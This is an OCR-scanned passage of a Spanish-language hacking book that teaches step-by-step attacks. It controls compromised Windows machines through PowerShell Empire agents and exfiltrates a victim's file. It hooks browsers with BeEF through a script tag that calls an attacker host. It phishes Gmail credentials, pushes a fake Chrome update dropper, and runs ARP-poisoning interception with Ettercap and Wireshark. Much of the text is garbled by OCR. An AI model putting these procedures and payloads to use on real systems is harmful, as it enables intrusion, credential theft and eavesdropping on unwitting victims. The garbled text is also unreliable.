remoto de su sistema. 


SECURITY WARNING Macros have been disabled, | Enable Content 
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Controlar al sistema remotamente 


Una vez que esto sucede y tienes acceso a tu 
victima, tendras acceso via una powershell, esta 


herramienta es aún más poderosa que una consola 


282 modules currently loaded 
de comandos, ya que puedes ejecutar comandos 


: 1 listeners currently active 
avanzados por este medio. 


0 agents currently active 


Obteniendo acceso al sistema 


ire) > [+] Initial agent EDFBRCXT from 192.168.1.83 now active (Slack) 
comprometido mitial agent 4ABTWGEF from 192.168.1.83 now active (Slack) 


Para interactuar con estos agentes, basta con 





Ahora en tu consola de Empire deberian escribir agents para que te de una lista e 


aparecerte agentes, es decir, sistemas informacion de los agentes, e interact <nombre>, 


comprometidos. siendo el ID el nombre del agente para obtener 


control del sistema por medio de powershell. 
re) > agents 
tive agents: 
Machine Name Username Process 


MSI\Pablo Gutierrez powershell/24004 
GEF ps 192,168.159,1 feMSI MSI\Pablo Gutierrez powershell/27592 


ire: agents) > interact EDFBRCXT 


) > 
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Una vez que tu terminal muestre el nombre del Archivos 


agente, significa que tienes un acceso por medio 


Debido a que ten 
ae | emos una jó 
de powershell, esto significa que, aunque tienes un conexion powershell, 


podemos hacer cosas co 
2 mo 
alto grado de control del sistema, tiene un pequeno navegar por los 


directorios del sistem 
: : istema comprometi 
retraso en tiempo de respuesta, y deberas usar prometido usando 





sintaxis Linux, ver archi 
i y chivos 
módulos de post explotación relevantes a , y descargarlos. 


powershell para hacer cosas más avanzadas. ( Em p l re: | 
(Empire: 
Obteniendo información del sistema Path 


Con el comando sysinfo la consola te dará 


información del sistema como sistema operativo, IP En \WI NDOWS\ SyS tem32 
interna, usuario, y nombre del proceso. 
ES 


(Empire: i 
(Empire: 
Path | 
a 


(Empire: ) > sysinfo 

(Empire: ) > sysinfo: O|http://192. 
0::e506:6c8d:abd1:a2d9 192.168.1.70 fe80;:f: 
84f|Microsoft Windows 10 Home| False |powersh 


EEN 





Listener: http://192,168.1.67:80 

192.168.159.1 fe80;:996; 
192,1 
MSI\Pablo Gutierrez 

Hostname: MSI 

OS: Microsoft Windows 10 Home 

High Integrity: © 

Process Name: powershell 

Process ID: 24004 

Language: powershell 

Language Version: 5 





(Empire: ) > 
LastWriteTime length Name 
| 
10/23/2017 2:20:26 AM 
2/28/2018 10:05:41 PM 
4/25/2018 6:47:09 PM 
1/7/2018 3:13:32 AM 
8/6/2018 10:30:35 AM 
10/22/2017 9:23:09 PM 


$GetCurrent 
$Recycle. Bin 
82ace/7d6-0197 





Config.Msi 
Documents and settings 
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Si encontramos un archivo que queremos 


descargar, por ejemplo, este archivo llamado 
ARCHIVO SECRETO.txt 


4/24/2018 11:24:16 AM 19 ARCHIVO SECRETO, ty 
Basta con ejecutar el comando download tras el 


i 
) Recent 
nombre del archivo, para descargarlo. | 


j > download "ARCHIVO SECRETO. txt” a 
) > [+] Part of file ARCHIVO SECRETO. txt from EDFBRCX 


‘Home 


(Empire: 
(Empire: 


(Empire: ie 
[*] File download of C;\ARCHIVO SECRETO.txt completed 


Nota que los archivos descargados se guardaran 


en la carpeta downloads dentro de la carpeta 











Empire. 
[< > |4 @ opt Explotacion Empire downloads  EDFBRCXT [f 
© Recent | = 
fa Home ARCHIVO 
| SECRETO. 
ma Desktop txt 
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Desktop 
Documents 


Downloads 





También, si requieres hacer algún comando en 
particular, puedes utilizar los módulos de Empire 


que están en la carpeta modules. 














persistence privesc recon situational.  trollsploit 
awareness 






Para utilizar alguno de estos, deberás utilizar el 
comando usemodule y searchmodule (si no 
sabes el nombre/dirección del módulo), primero 
usa searchmodule para saber la dirección del 
módulo, vamos a buscar uno que imprima un 
mensaje en la máquina del objetivo, para esto 


escribe searchmodule message. 


389 


WHITE SUIT 


m ree E A 
> 4 E opt Explotacion Empire lib modules powershell k a| E l | 
| code- collection credentials  exfiltration exploitation lateral- managemen 

| execution movement t 
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(Empire: ) > searchmodule message 


python/trollsploit/osx/change_background pne Reguiren ya uig Description 
j | AS Lost contact with the Message text to display, 
Change the login message for the user. Domain Controller, 
ontype True Critical Critical, Question, Exclamation, or 
Information 


powershell/trollsplo1t/message ent True EDFBRCXT Agent to run module on, 
| He True ERROR - 0xA801B720 Title of the message box to display. 


Displays a specified message to the user. | = 
ire: povershell/trollsploit/message) > set MsgText "“WhiteSuit Hacking te ha hackeado." 











Y para ejecutarlo, basta con escribir usemodule En este módulo, se mostrará un mensaje de error 


trollsploit/message, nota como solo escribí lo que en la computadora del infectado, sin embargo, hay 


sigue de powershell, ya que lo primero está a 
g p ya q p otros módulos desde para robar contraseñas, hasta 


implícito. aqui 
plíci para atacar a otras máquinas desde la maquina 


(Empire: ) > usemodule powershell/trollsploit/message! comprometida. 


: Nota: “opsec safe” se refi ; 
(Empire: ) > usemodule trollsploit/message P jere a que este modulo es 


(Empire: powershell/trollsploit/message) > E muy notorio, sin embargo, existen otros más 


sigilosos. 


E: ERROR - 6x48018720 


Cualquier módulo que ejecutes deberás | 
l E p (Empire: powershell/trollsploit/message) > execute 
configurarlo con la opción info, modificar las y 
(mire: powershell/trollsploit/message) > peon 
ob started; 645LBZ _-. 
| [ax] 


posteriormente con execute. | 








variables que necesites con set y ejecutarlo 





(Emplre: powershell/trollsploit/message) > into} 
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Adicionalmente, hay muchas más cosas que 
puedes hacer de las que mencione, pero puedes 
darte una idea escribiendo el comando help y 


dándole un vistazo a las carpetas en módulos 


dentro de Empire. 





(Empire: ) > help 
Agent Commands 





Jump to the agents menu. 
ack Go back a menu, y | r 
e Runs BypassUAC, spawning a new high-integrity 
assuac 5 as SUAC Da 
aie Clear out agent tasking. ras 
dl Display/return credentials fren rhe dé 
creds ¿ o eng X 
download Task an agent to download Jet i 
downloads Return downloads oF kill a GOW 
xit Task agent to exit. E 3y 
hel Displays the help menu or syn aX ! | 
help Display information about this agen Rae enee a O 
inte | I ject listener shellcode into a remote process, © 
injectshellcode njec tener sheti 
q | RER nE S i o process name or ID, 
{ : sn age dill a particule 55 : 
Task an agent to ki par a 
rae ate Get or set an agent's killdate (01/01/201 ) 
Nai Lists all active agents {or listeners). 
tist Sia ¢ k $ ae | mt 
j "6 ' to the Listeners menu, | ae: pees 
eae reek a agent to chande the Limit on lost agent detec 
ystlimit q gent t | 
ne Go back to the main menu. vient 
Mi ikatz Runs Invoke -Mimikatz on the clie a 
Lime Inject a launcher into a remote pre ais 
reia Executes PTH for a CredID through MimiKatz. 
pth xecute 
Rename the agent. 
ame t i 
a Read and execute a List OO R 
Uses credentials/ tokens to reve 


agent for a Listener, Ex. spawn <liste 





for particular commands. 








Ex, psinject <listener> <pid/process name 


resource 
revtoself 
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Ataques por medio del navegador 


Otra de las formas de comprometer un sistema 
tiene que ver con ejecutar código malicioso en una 
página web. El fundamento de esto, es que todos 
los navegadores corren páginas sobre un lenguaje, 
antes Java y Flash eran muy comunes, sin 
embargo, hoy en día el más común es JavaScript, 
que es de hecho es tan común, que prácticamente 
todas las páginas web corren algo de JavaScript, y 
todos los navegadores, tanto de Android, como 
Linux, como Windows, Macintosh y iOS, ejecutan 
JavaScript para cargar páginas web, así que eso 
convierte al lenguaje en uno de los vectores de 
ataque más versátiles que existen. 
Sin embargo, tiene limitantes, el primero es que, en 
la mayoría de los sistemas, los navegadores corren 
en una caja de arena, es decir, no es tan fácil 
saltarse del acceso al navegador al sistema, 
aunque utilizando un poco de ingeniería social y 


algo de creatividad, es posible y el segundo, es que 
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la víctima tiene que tener el código malicioso Las ligas que nos interesan son las que tienen la IP 


LAN o pública, no la que tiene la dirección local. 

‘~# cd /usr/share/beet -xss/ 

bd :‘/usr/share/beef-xss# ls 

Malware en página web por medio de JS malicioso s beef cert.pem config.yaml db Gemfile modules 
beef key.pem core extensions Gemfile. lock 


ejecutandose para que tengas acceso. 





ienta que utilizaremos en esta ocasion se 
“ale i :usr/share/beef-xss# ./beef 


llama beef-xss, es una herramienta escrita en 43:38] +] Bind socket [imapeudoral] listening on [0.0.0.0:2000]. 
1:43:38] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha 


Python que esencialmente te dará dos cosas: 13:38) Li Cheer pronect 
_ Una liga a un código malicioso 43:38] | Site: http://beefproject.com 

l 3 > - A 43:38] | Blog: http://blog.beefproject, com 

JavaScript, que se llama “hook 43:38] | Wiki: https://github.com/beefproject/beef/wiki 
oe Ma Ls 4 ctarlo en 43:38] Project Creator; (@WadeAlcorn) 
Este codigo malicioso nig Vee e 43:39] BeEF 1s loading. Wait a few seconds... 
una pagina web y enviarla a tu victima. 43:43] |) 12 extensions enabled. 
43:43] 254 modules enabled. 
2. Un panel de control 43: 2 network interfaces were detected. 


running on network interface: 127.0.0.1 
| Hook URL: http://127.0.0.1:3000/hook. js 





En este panel de control ejecutaras los 


ataques a tu victima. 43: | UI URL: — http://127.0.0.1:3000/ui/panel 
= +| running on network interface: 192.168.1.67 
Esta herramienta ya viene preinstalada en Kall, asi 43. | Hook URL: http://192. 168.1.67:3000/hook.js 
irla, ejecútalo en su directorio 43: | UI URL: http://192.168.1.67:3000/ui/panel 
que, para abrirla, ej 43: RESTfUL API key: 0bc213592966242103a9160aa5c712b160194622 


Jusr/share/beef-xss y escribe ./beef-xss dentro 1:43 HTTP Proxy: http://127.0.0.1:6789 
1143; BeEF server started (press control+c to stop) 





del directorio para ejecutarlo, una vez que lo 
ejecutes, te generara dos ligas con tu IP, una es 


pol. Así que lo primero que harás, es abrir un 
del panel de control y la otra es la url del código 


navegador, y escribir http://<IP>:3000/ui/panel, en 
malicioso(hook). | 
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Hooked Browsers Getting Started Logs 








E 


O Online Browsers 
i O Offline Browsers 


los campos de autenticación el usuario y la 


contraseña son ambas beef. 





i I Authentication x AS 





pe EQ Search 
= — 


















Official website: http://beefproject.com/ 


Ahora, ve hacia tu directorio publico, es decir 





/var/www/html, y crearas un nuevo archivo 


- Authentication index.html escribiendo gedit index.html, se abrirá 
Username: beef k un editor de texto, si hay algún código en este 
- Password: 0000 | ; 


archivo, bórralo. 


ton] :/# cd E 
: /var/www/html# gedit index.html 


Este es tu panel de control, aquí es donde 





ecerán los navegadores que estén Ahora, escribirás en este archivo, el siguiente 
apar 


comprometidos, ahorita no has utilizado tu “hook código. 
(el código malicioso) en ninguna página, asi que 
naturalmente debería de estar vacía la carpeta 


Mot type="text/javascript" src="http://192.168.1.67:3000/hook.js"></script> 
“online”. t 


all> 
l L 
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No 
Lo importante aquí, es la tercera línea, esta puede Controlando el sistema es 


ser inyectada en cualquier pagina, pero ahorita Una vez que tienes el sistema comprometido 


dejamos la pagina en blanco por simplicidad, pero deberas hacer clic en el sistema dentro de la 


odrias haber usado cualquier pagina web. ; : | 
podrías haber usa q pag carpeta, y te aparecerán módulos que puedes usar i 


inici ici che2 para hacer 
Ahora inicia el servicio Apache2 para ha para atacar, pero primero tienes que entender el 


accesible tu directorio público. 


: Ayar /www/html# service apache2 star 


significado de estos. 





Controlar al navegador te permite hacer mas cosas 





de lo que piensas, en cuanto a los modulos, lo que 





Listo, ahora solo falta que tu victima abra la pagina tienes que entender es que verde significa que el 


web, y en tu panel de control te aparecera su ; ; si 
y p p módulo funciona y es sigiloso, naranja es que 


navegador, para probarlo, puedes abrir la página funciona, pero no es sigiloso, blanco es que no se 


web inaresando tu IP en cualquier navegador, algo , ; ) 3 
g q g g sabe si funciona, y rojo es que no funciona. 


así como http://<ip>, por ejemplo, en mi caso sería 
http://192.168.1.67 
Al abrir esa página, podrás ver en tu panel un 


nuevo pa en línea. 





| | a Hooked Browsers 
| å i) Online Browsers 

| > 

| 4 =} 192.168.1.67 

| 

? ME 192.168.1.83 


_ } Offline Browsers 
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ca Starte ted ; Logs _ Current Browser 








“petal Logs $ Commands | Rider ll XssRays # Ipec | fMetwerk | WebRTc 





Hooked Browsers 



















cater Browser (6 Items) 
To interact with a hooked browser simply left-click it, a new tab will appear. Each hooked browser tab ha 


er Version: UNKNOWN 
number of sub-tabs, described below: Bons 


prowser UA String: Mozilla/5.0 (Windows NT 10.0; Wind: x64) Apple WebkKit537.38 (KHTML, like Gecko) Chrome/67.0.3396 99 Safari/537.36 
Browser Language: en 


Main: Display information about the hooked browser after you've run some command modules, 
Browser Platform: Win32 


Logs: Displays recent log entries related to this particular hooked browser. 
Commands: This tab is where modules can be executed against the hooked browser. This ¡s Where 
most of the BeEF functionality resides. Most command modules consist of Javascript code that is 
executed against the selected Hooked Browser. Command modules are able to perform any actions 
that can be achieved through Javascript: for example they may gather information about the Hog e 
Browser, manipulate the DOM or perform other activities such as exploiting vulnerabilities within the he 
local network of the Hooked Browser. 


Browser Plugins: Chrome PDF Plugin.Chrome POF Viewer,Native Client 
Window Size: Width: 1920, Height: 947 


Y Category: Browser Components (12 Items) 
Y Category: Hooked Page (5 Items) 
Y Category: Host (8 Items) 


La pestaña “Details” te servirá para obtener 


| 
| 


Each command module has a traffic light icon, which is used to indicate the following: 
The command module works against the target and should be invisible to the user 
1 The command module works against the target, but may be visible to the user 


información del dispositivo, pero lo que realmente 


nos interesa es la pestaña llamada “Commands”, 
The command module is yet to be verified against this target 


i ; j as 
© The command module does not work against this target donde estan los modulos que podras ejecutar 


contra el sistema. 





i i 


XssRays: The XssRays tab allows the user to check if links, forms and URI path of the page (where "Details | to as f Coma] 


the browser is hooked) is vulnerable to XSS. 





Rider: The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser e | ae Tree 

Each request sent by the Rider is recorded in the History panel. Click a history item to view the + Cada modulo tiene diferentes USOS, pa. à os 
headers and HTML source of the HTTP response. | ¡ Searc | 
Network: The Network tab allows you to interact with hosts on the local network(s) of the hooked desde obtener información > C] Browser (53) 


- L] Chrome Extensions (6) 
> (J Debug (9) 


browser. a ; 
adicional del sistema (como que 


pean 


Una vez que hagas clic en el sistema 


ACAMAAIIIII RI 


a a . z D [Exploits (78) 
: , > antivirus tiene instalado), hasta > EJHost 
comprometido, veras un menú con varias pestañas. | (2) 
reconocimiento en la red de la | > COIPEC ES) 
| > [_]Metasploit (1) 
víctima para encontrar o atacar | » [JMisc (16) 
| D £ Network (19) 
sistemas NAS o routers, son | b (5) Persistence (5) 
| b> EJ Phonegap (16) 
{ 


demasiados ataques y módulos 


> [7 Social Engineering (21) 
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para mencionarlos todos, asi que te dare dos 


ejemplos con los cuales al saber la mecanica de su 


funcionamiento podras ejecutar cualquiera de los 


demas modulos. 


Robo de credenciales 


Lo primero que veremos es como podrías utilizar el 
navegador infectado para redirigir a tu víctima a 
una página falsa donde podrás robarle sus 


credenciales. 
Para empezar, ve a la carpeta de “Social 


Engineering” y selecciona “Google Phishing” 

a 3 Social Engineering (21) | 
- Clickjacking | 
_ Fake LastPass | 
_ Leamtuf Download 
@ Clippy | 
B Fake Flash Update 

Ə Fake Notification Bar (Chror 

B Fake Notification Bar aig T 

® Fake Notification Bar (E) | 

Ə Google Phishing | ` 


Dentro de las opciones, en el XSS Hook está el 
HTML que se utiliza para el ataque, en este caso 


tiene un modelo de Gmail, sin embargo, tú puedes 
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darle la ruta de alguna Pagina maliciosa que tu 


hayas creado, por ejemplo, con SEToolkit o 


Shellphish de las secciones anteriores 
¿Google Phishing = | 


on: This plugin a n $ x ll = - = 
pasay an image ta SRF = = 
URL is NOT the Gmail om D) g to XSRF the logout button of Gmail. Conbnuously the user is logged out o 


' 


id: 31 
[XSS hook URI: ‘http://0.0.0.0:2000/demos/basichtml = = =~ ~ mmm - 


Gmaili logout | 10000 === 


interval (ms): * es j 
Redirect delay ¿1000 ———h 
(ms): —— 


Al confi 291 

onfigurar la página que deseas utilizar, ejecuta 
el comando en el botón “execute” a la derecha 
inferior de la página. 





¡PA 


Dap Ms et AR 
WHR OT a ead Bay TOOGA a ona Corea ents eg ut HEC eg Fea bogat 
ined ND OIDE IN ALION Ke ll ree the Gh 
t E 1 
MEY ANE tt sh Og 


< it 








ERLIE derie opcenito Mer 
aloe 3105 
simy © = 


# 


eseas pog 
iraj: i 


403 


f Gmail (eg. if ha is logged in in another tab). Additio sp we sh 











Al hacer esto, la página de la víctima se redirigirá 


de la página a la página falsa creada 


M Cge libis X 





e G O totsecure | 192,163 67 : = = A z = >> = 








Google Mail 
A Googe approach to eimai 


Username 
i Fria > seh Ar 
+ on the Ades thai sins! can be more nus eficent ead ursis An i 





A ti en tu panel te aparecerá ahora una pestaña en 
la sección de resultados. 


Module Results History 


da date label 
0 2018-08-08 01:50 command 1 


Y si haces clic, te mostrará lo que tu víctima 
escribió en los campos. 
Command results 


1 | | i 
data: result=Username: librodehacker@gmailcom Password: contrasenahacke 
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Descarga de malware 


Ahora, si lo que buscas es obtener acceso a su 
sistema, probablemente uno de los mejores 
caminos para ello sea engañarlo para descargar un 
ejecutable malicioso. 

Ahora, recuerda que este código malicioso lo 
puedes inyectar en cualquier página, así que, con 
esto, desde el punto de vista de la víctima, es el 
navegador el que le está diciendo lo siguiente, 
vamos a intentar convencer a la víctima de que 
descargue una “actualización” que tenga código 
malicioso. 

Para esto, de nuevo, ingresa a la carpeta de 
“Social Engineering”, pero ahora seleccionamos 
uno de los siguientes módulos, lo que hará es que 
mostraran una descarga o notificación a descarga 
para que tu víctima descargue un ejecutable. 


D Fake Flash Update 

D Fake Notification Bar (Chrome) | 
D Fake Notification Bar (Firefox) | 
D Fake Notification Bar (IE) | 
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Vamos a utilizar el ejemplo de Chrome, pero toma 
en cuenta que puedes modificar los archivos para 
que muestren lo que consideres adecuado. 

Ahora después de hacer clic en el módulo, podrás 
elegir una URL con una liga al ejecutable malicioso, 
una vez que configures eso, ejecuta el programa, 


de nuevo con el botón “execute” a la derecha 


inferior. 


Fake Notification Bar (Chrome) 
Description: 
You can mount an exe in BeEF as ger extensions’social_engineering/droppers/readme. bt, 


Id: 24 


URL: ' http://0.0.0.0:2000/dropper,exe ! l = f 





— ‘Additional plugins are required to Gsplay all the media on this page. 
ex * — — - — —— oo I1 ee xP —— 





A tu víctima le aparecerá una notificación similar a 
esta, y al hacer clic se descarga el ejecutable al 
que tu hayas apuntado en la URL en la pantalla 
anterior, y, al ejecutarse, te daría un acceso remoto 
relativo al ejecutable que enviaste (claro, si envías 
un ejecutable por ejemplo de Metasploit, deberás 


tener el escuchador activado para establecer una 


conexión). 
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Displays a fake notification ber at the top of the screen, similar to those presented in Chrome, If the user dicks the notification they will ba prompted to dovantosd the fila Spec beise 














> ¢ (0 122168167 oo 














Additional plugins are required to display all the me | 


Recuerda tomar en cuenta la sección de detalles al 


INICIO para seleccionar la barra de navegador y el 
tipo de malware a utilizar. 


Otros ataques 


Hay muchos más módulos para atacar en Beef, 
desde intentar obtener información de correos 
electrónicos, hasta secuestro de sesión, 
persistencia, o incluso obtención de información de 
Ubicación entre otras cosas, especialmente si se 
está en un dispositivo móvil, así que recomiendo 
que veas todas las carpetas y módulos, todos se 
ejecutan de forma similar, con el botón “execute” y 


modificando las variables al seleccionar el módulo 
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o: 


_Install Missing Plugins... | x 











a Misc (15) 
JIEM Notes (5) 
BoreCrack 


® Confirm Close Tab 3 
B Create Foreground iFrame 
® Create Pop Under 


Cie ate itrreie i ane a 3 Phonegap (1 6) 


Googe Search 
Wordpress Post-Auth RC 
iFrame Event Logger 
Local File Then 

@ BlockUi Modal Disiog 

p Raw JavaSript 

@ Read Gma 

p UnBiockUl 

@ Frame Sañes 

Network (19) 

a -J Persesience (5; 
Man-in-The-Browser 
Wordpress add Admin 

O Confirm Close Tab 


Alert User 
Beep 
Check Connection 
Detect PhoneGap 
Geolocation 
Globalization Status 
Keychain 
List Contacts 
List Files 
List Plugins 
Persist resume 
Persistence 
Prompt User 
Start Recording Audio 
Stop Recording Audio 
Upload File 
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Compatibilidad 


Este ataque funciona con todos los navegadores, 
ya sea en dispositivos móviles o en computadoras, 
haciéndolo altamente versátil, así que no dudes en 
intentar los módulos en la carpeta “Phonegap” si 


obtienes acceso a un dispositivo móvil. 


Ataques Wifi 


Ataques de intercepción de información en 
la red (MITM) 


Si estamos conectados a una red en donde 
queremos espiar a los usuarios conectados a esta, 
podemos hacer lo que se llama un ataque de 
hombre en medio, o MITM, por sus siglas en inglés. 





Este ataque, aunque muy útil, es bastante sencillo, 
a pesar de que estadísticamente hablando 
(especialmente en México) muy pocas 
organizaciones han puesto mitigaciones contra 
esto, funciona poniéndonos entre dos sistemas que 
están en comunicación 
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Para que me entiendas mejor, imagina que 
tenemos tres personas en una habitación, Juan, 
Rodrigo y Alan, cada uno tiene un número en esa 
habitación, Juan tiene el número 1, Rodrigo el 2, y 
Alan el 3, y utilizan estos números para 
comunicarse, es decir, si Juan quiere mandar un 
“hola” a Rodrigo, no pone en el remitente “Rodrigo”, 
pone “2”, adicionalmente, Juan y Rodrigo solo 
mandan lo que comuniquen una vez a una sola 
persona. Juan y Rodrigo están teniendo una 
conversación privada, y Alan, quiere escucharla, 
entonces Alan empieza a mentir, le dice a Rodrigo 
que Alan es el 1, y a Juan que Alan es el 2, 
entonces Juan le manda el Hola a Alan, Alan le 
manda el hola a Rodrigo, y Rodrigo contesta, sin 
embargo, a través de esto, Alan está viendo todo lo 
que se comunica entre Juan y Rodrigo mientras 
que no esté encriptado. 

A pesar de que el ataque es muy efectivo, es 
relativamente fácil de identificar si sabes que estás 


buscando, piensa lógicamente, en el ejemplo 
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anterior, si Juan y Rodrigo se dicen “hola” cada 
| | quien, ¿cuántos “holas” se mandaron? Dos, sin 
embargo, si Alan se pone en medio, y recibe el 
| “hola” de Juan, y se lo manda a Rodrigo de parte 
de Juan, y Recibe el “hola” de Rodrigo y se lo 
manda a Juan de parte de este, cuantos “hola” ¿se 
mandaron? La respuesta es cuatro (el doble), esto 


se conoce como duplicación de paquetes, hablaré 
de esto en unas páginas más. 





User 


Web Application 


| 





Man in the Middle 
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Protocolo ARP 


Antes que podamos realizar ataques, hay que 
entender un poco sobre el protocolo ARP (Address 
Resolution Protocol). Este es un protocolo utilizado 
principalmente en routers y switches que se utiliza 
para procesos relevantes a asociar una direccion 
fisica (MAC) con una direccion IP, y es bastante 
sencillo de entender, lidia con dos cosas 
principales, una pregunta, y una orden: 
1. ¿La pregunta “Quién tiene esta IP? Dile a 
esta IP” 
Esta pregunta simplemente pregunta qué dirección 
MAC tiene asociada alguna dirección IP en 
particular, sirve para saber a qué máquina se 
enviara algún paquete, y también para saber si la 
dirección IP ya está asociada o está disponible, de 
hecho ya hemos utilizado de esta forma este 
protocolo, al realizar un escaneo nmap en la red, 
esta forma de saber quién está o no en la red tiene 
una ventaja importante: no le tenemos que 
preguntar directamente a un sistema por medio de 
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un paquete TCP o ping, podemos simplemente 
preguntarle al router, además, los firewalls 


A O 


típicamente bloquean fácilmente los paquetes TCP 
que los ARP, ya que los ARP son utilizados mucho | 
por el router. 

Este paquete usado de esta manera se ve similar a 
la imagen, nótese que está preguntando quien 
tiene una IP en particular, y ordenando que se le 


mande la respuesta a una IP en particular. 


ARP 42 who has 192.168.1.100? Tell 192.168.1.5 | 
ARP 60 who has 192.168.1.55? Tell 192.168.1.4 

ARP 42 who has 192.168.1.119?> Tel} 192.168.1.5 

ARP 42 who has 192.168.1.1007 Tell 192.168.1.5 h 
ARP 60 who has 192.168.1.5? Tell 192.168.1.4 $ 
ARP 42 192.168.1.5 is at 50:46:5d:33:3f:8b 

ARP 60 who has 192.168.1.557 Tell 192.168.1.4 


2. La orden “Esta IP está en esta dirección 
MAC” 
El otro uso del protocolo ARP es para dar órdenes, 
en este caso, asignando una IP a una dirección 
MAC, desde este momento, cualquier paquete que 
se envíe a esa dirección IP en particular, será 


recibida por el sistema a la cual está asignada esa 
IP. 


ARP 44 192,168.65.129 is at 00:0c:29:ad:ee:69 
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Envenenamiento ARP 


Ahora que entendemos cómo funciona el protocolo 
ARP, podemos empezar a mandar paquetes de 
este protocolo “mintiéndole” a los sistemas en la 
red para interceptar sus paquetes. 

Para esto, abre la herramienta Ettercap, 


escribiendo en la terminal de Kali ettercap -G. 


+ ettercap -G 


Enseguida deberia abrirse la siguiente ventana. 





ettercap 0.8.2 e® 96 
Fite Sniff Options Info 





ercap 
| 


Esta es la herramienta que nos permitirá realizar el 
ataque de hombre en medio, por medio de lo que 


se llama envenenamiento ARP, debido a que 
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Poy 


mandaremos paquetes ARP para “mentirle” a los 
sistemas sobre nuestra identidad en la red. 
Ahora haz clic en donde dice “Sniff” y “unified 


sniffing en el menú superior. 


File Sniff Options Info 


Unified sniffing... Ctrl+U 






Bridged sniffing... Ctrl+B | 


Set pcap filter... Ctrl+P | 


Posteriormente te aparecerá una pantalla en donde 
seleccionas tu interfaz de red, esta debe de ser la 
interfaz por la cual estas conectado a la red local 
que intentaras interceptar, en mi caso es la eth0, 
pero puede ser diferente para ti si estás utilizando 
alguna antena wifi externa, o no estés 

virtualizando. 


415 








ettercap Input 


e a 


9 Network interface : | ethQ 


5 AAA 
ee — or Er 





Ahora que ya está iniciado y cargado Ettercap en tu 

interfaz, lo primero que querrás es un listado de los 

sistemas conectados a la red, así que del menú 

superior selecciona “Hosts”, y “scan for hosts”. 
Hosts View Mitm Filters Lt 


Hosts list Ctrl+H 


Enable IPv6 scan | 
Scan for hosts Ctri+S 
Load from file... 


Save to file... A 
een D 


Esto escaneara a las máquinas existentes en tu red 
mandando paquetes ARP con la funcion 1 que 


menciona, pero no muestra el listado, para esto, 





deberás hacer clic en el mismo botón del menu 


superior, pero ahora presionar Hosts list’. 
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Hosts View Mitm Filters Lo 
Hosts list 





Enable IPv6 scan 


Scan for hasts Ctrl+S 
Load from file... 


Save to file... 


Ahora te deberia de aparecer un listado de todos 


los sistemas conectados en tu red, mostrando su 
dirección IP, y su dirección MAC, así como su 
descripción si es que la tiene. 

nota: censure los datos de los equipos por 


seguridad. 
ettercap 0.8.2 
Start Targets Hosts View Mitm Filters Logging Plugins Info 








Host List x | 








IP Address Description 
1192.168.1.65 9 8: 78.local 
-192.168,1.70 9 31 

192,168.1.71 F; 4 : 

192.168.1.76 3 6 

-192.168.1.79 0 19 : 

192.168.1.83 4 E 

192.168.1.115 B c8: 

192.168.1.132 E 2 

417 




















Kernel IP routing table 
Destination Gateway Genmask Flags Metric Ref 






0.0.0.0 


192.168.1.0 0.0.0.0 250M 259 LAA 100 0 ) i ra 
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Ahora, tendrás que seleccionar tus víctimas, es 


== 


decir, en medio de qué sistema o sistemas te 


get 2 | 





quieres poner, en este caso no necesariamente 






1254 a eae 








tiene que ser uno, pueden ser muchos (pero 


dependiendo de tu sistema y tu antena, podrias 


— 





o 
O 


Delete Host ie | : 
ee le M to Target Add to Target 2 


Listo, podemos confirmar nuestros objetivos, o 
de una maquina, por ejemplo, la 192.168.1.83, con hacer cambios, en la sección “targets” | 
) s”. 








toparte con cuellos de botella). 
En este caso queremos interceptar la comunicación 


el internet, que es a través del router, pero ¿que si | 
Targets Hosts View Mitm Filters 


Curr ent tar gets Ctrl+T 
Select target(s) S hift+Ctrl+T | 






no sabemos la dirección del router”? 






Puedes encontrar esta información simplemente 
escribiendo en otra terminal route -n. 
Protocol... Ctrl+P 


‘—# route -n 
Reverse matching 


192,168,1,254 0.0.0.0 UG 100 90 | Wipe targets Ctrl+W 

















Obtuvimos que la dirección del router es la > peet E 
192.168.1.254, entonces agregaremos la víctima, | Misi ae | a= Ee 
que es la que tienen la IP con terminación 83, | i | 
como “target 1”, y la ip del router, con terminación | | 
254, en “target 2”. | | 
E DIAN EEN ee 
wie 419 








Ahora, para iniciar el ataque, seleccionaremos del 
menú superior la opción MITM, seguido de ARP 
Poisoning. 


Mitm Filters Logging Pl 





ARP poisoning... 
ICMP redirect... 
Port stealing... 
DHCP spoofing... 
NDP poisoning... 


Stop mitm attack(s) 


Y selecciona la opción “sniff remote connections”, y 


luego presiona ok. 


MITM Attack: ARP Poisoning @ 


pa as 


En la terminal te confirmara los shiclions a quienes 





les haras el envenenamiento ARP. 
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ARP poisoning victims: 
GROUP 1: 192.168.1.83. ¡EE 


GROUP 2: 192.168.1.254 28 


Y listo, ya solo presiona Start y “Start sniffing” y ya 
estaras realizando envenenamiento ARP, esto 
causara que todos los paquetes que manda y 
recibe tu objetivo, pasen por tu interfaz, 


permitiéndote espiarlo. 






Start Targets Hosts View Mit 
Start sniffing Shit Ctrl+ W 
Shift+Ctrl+E 





Stop sniffing 


Exit Ctrl+Q. 
Interpretando paquetes en WireShark 


Como te habras imaginado, mientras que los 
paquetes pasen por nuestra interfaz, WireShark 
puede ser utilizado para analizar dichos paquetes, 


así que basta abrir WireShark como se mencionó 


421 




















en la sección de WireShark, y notaras que ahora 
estás recibiendo paquetes con destino y fuente del 
sistema a quien estás haciendo el ataque. 

Aquí podemos ver exactamente que paso con este 
ataque en cuestión de paquetes, nota como 
WireShark está dando un aviso de que existe un 
uso duplicado de una IP, esto es porque 


esencialmente le estas mintiendo al router sobre tu 


identidad en la red. 





142 192.168.1.254 is at 
pee 192,168.1. 83 is at 


sup JA 25 Jete li 


Todo lo demás de WireShark funciona 


esencialmente igual, solo que ahora tendrás 


: : : 
acceso a paquetes fuera de tu sistema, asi que, S 


alguien entra a alguna página web, transmite 


| = a 
credenciales sin encriptar, o algo similar, podra 


verlo en WireShark. 
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Aquí solo toca observar esa pantalla para ver las 


ns B 
— 


WHITE SUIT 
Interceptando Imagenes 


Ahora, aunque WireShark te muestra todo, no 
siempre es practico estar buscando los paquetes 
de cosas especificas como imagenes, asi que hay 
una herramienta llamada driftnet, que filtra las 
imagenes y te las muestra directamente, existen 
herramientas similares para filtrar otros tipos de 
paquetes, lo cual podrian hacer tu trabajo mas facil. 
Para ejecutar la herramienta, escribe en la terminal 
de Kali driftnet -i <interfaz>, en este caso mi 
interfaz es eth0, asi que el comando para mi seria 
driftnet -i etho. 


Al ejecutar el comando, se abrirá una ventana 






donde se mostrarán las imágenes interceptadas. 
000 





driftnet 






:-# driftnet -i etho 






